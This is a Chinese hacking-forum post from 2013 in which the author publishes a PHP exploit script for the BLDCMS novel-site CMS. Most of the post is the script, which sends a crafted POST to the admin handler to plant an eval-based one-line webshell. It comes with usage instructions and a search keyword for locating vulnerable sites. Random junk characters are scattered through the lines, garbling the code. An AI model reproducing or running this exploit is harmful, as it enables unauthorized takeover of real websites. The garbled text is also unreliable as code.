之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
8 M1 Z4 f0 j d9 M: P; g+ `5 r
+ M* e4 b, S9 e5 ? 0 C$ r/ v5 h# _7 ~8 t- T
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 & w' w7 b9 q9 b# F5 e
6 O1 c, s7 J5 H5 Y4 c( ~
既然都有人发了 我就把我之前写好的EXP放出来吧% U1 s4 n2 O1 x
: N) k# v; t/ ^. A! \: [
view source print?01.php;">1 Y- E. T! ]% x, X5 z' U# f
02.<!--?php
+ W3 A* u/ t# F9 U" P c03.echo "-------------------------------------------------------------------
( o) k# i& _( [% ?04. - x& B1 @( |+ h8 p" B% G& y
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP: Z! u9 V9 J. ^2 ^* c+ F6 t
06. : X) o% W K f5 \& S; h" _
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
0 ]1 |9 O( V. V' S1 t08.
* H9 a! z, F4 F6 g& ~09.QQ:981009941\r\n 2013.3.21\r\n 3 ?- _( t6 Z" D0 f2 W+ {( F8 l
10.
3 p/ L, B! e( Q& Z11. 7 r7 ~; |( I/ N% W
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
/ B. \ g- g5 M P1 @, J13.
& [ j: a5 {. a4 f14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n----------- l& j' K+ a& D& N' @. X) K
15.
9 `& M ]/ P8 ^5 K16.--------------------------------------------------------------------\r\n";) Q4 Y: e v8 X0 f% w0 k; x
17.$url=$argv[1];8 G9 {( Y! L4 m- q, E
18.$dir=$argv[2];
$ T4 R& g7 g* Q0 ?. C19.$pass=$argv[3];0 @* J0 Q7 M# _ l
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
) ^* f# p, q# }7 K21.if (emptyempty($pass)||emptyempty($url))
! x$ A; ^4 `8 j7 t22.{exit("请输入参数");}% e) Z' r1 _: d# w% v$ p4 y
23.else! m4 F G& A8 B4 w* b
24.{
& g4 v8 V' [! r' }25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev7 u0 d3 K1 Z4 `) D6 T& k
26. . Y! J1 P" ], R6 ?3 Z0 A% J9 F
27.al;: {' i" ^( U& k3 s# Z8 k/ N* R
28.$length = strlen($fuckdata);- C) D: U& V0 h+ f5 K- u
29.function getshell($url,$pass)1 {: a, d! d* f" U7 M7 W, [
30.{. D, G( M9 n0 H# B8 U9 I7 ~
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
7 G2 ?; u; {% r- ~1 V" P32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
9 w/ `8 B; p. C1 p) W+ i/ l/ T' S33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";# }# o( Y" H1 F- q5 Y9 Y/ ~! H
34.$header .= "User-Agent: MSIE\r\n"; e( g3 U# ^/ A. d5 Y; }2 @7 L
35.$header .= "Host:".$url."\r\n";! S% w% o* `9 U. k4 T. S8 L; W
36.$header .= "Content-Length: ".$length."\r\n";
, x. R# \* j( d" K6 P; X! s37.$header .= "Connection: Close\r\n";& }7 q5 o8 l3 c& s* C
38.$header .="\r\n";" V9 v8 l, b, P8 V1 f4 e6 Q
39.$header .= $fuckdata."\r\n\r\n";! g( j1 I- R9 g8 i8 o- P3 I
40.$fp = fsockopen($url, 80,$errno,$errstr,15);$ ~: F, t' @, _5 e8 d9 [' i+ ?
41.if (!$fp)! x. `2 g. E0 s+ d
42.{" p4 x( i4 `8 F9 u9 E H4 q) c, a
43.exit ("利用失败:请检查指定目标是否能正常打开");
0 `- n" c" M% e0 L0 Y( {44.}6 U: m6 R7 X! T
45.else{ if (!fputs($fp,$header))
7 |- I' Z- \2 ?" L' F/ k46.{exit ("利用失败");}5 D$ s; y+ ?" q- n8 q2 ]6 t
47.else
. S7 R- X/ [: S48.{" N* p+ T; W3 l+ t; M9 \! |! @
49.$receive = '';1 |- x. S# G6 a2 W* c. T
50.while (!feof($fp)) {
, M3 D. q7 g+ C$ i8 N8 @+ b3 ^51.$receive .= @fgets($fp, 1000);) z' e, J9 U4 n8 r- ~; X. I
52.}+ ~ l& u3 V" g( J
53.@fclose($fp);
! k1 C4 `! t9 P7 f. H* A. Q54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标8 ^, v8 d) g+ s6 @. A1 i+ F* C
55. , a1 ~6 f! g$ H& N$ c5 H3 D
56.GPC是否=off)";9 z7 R6 R& M3 m5 e
57.}}
4 Y8 j; j9 T- a ~58.}/ u! ?5 M3 J0 y! H3 K) o. L
59.}7 W" {) c y/ b) K4 F, `+ K
60.getshell($url,$pass); f4 B. a1 Z( e
61.?-->
$ b. w" `8 i; D# s9 M ! f1 G; }' W0 [! m: w) X+ _4 t5 {
2 j+ c, q2 m5 v9 `! C* q/ R6 d w2 J
$ D# c! o& ^! A: lby 数据流/ h% X. Y0 [4 ~. B
|
发表于 2013-3-26 20:49:10
收藏
支持
反对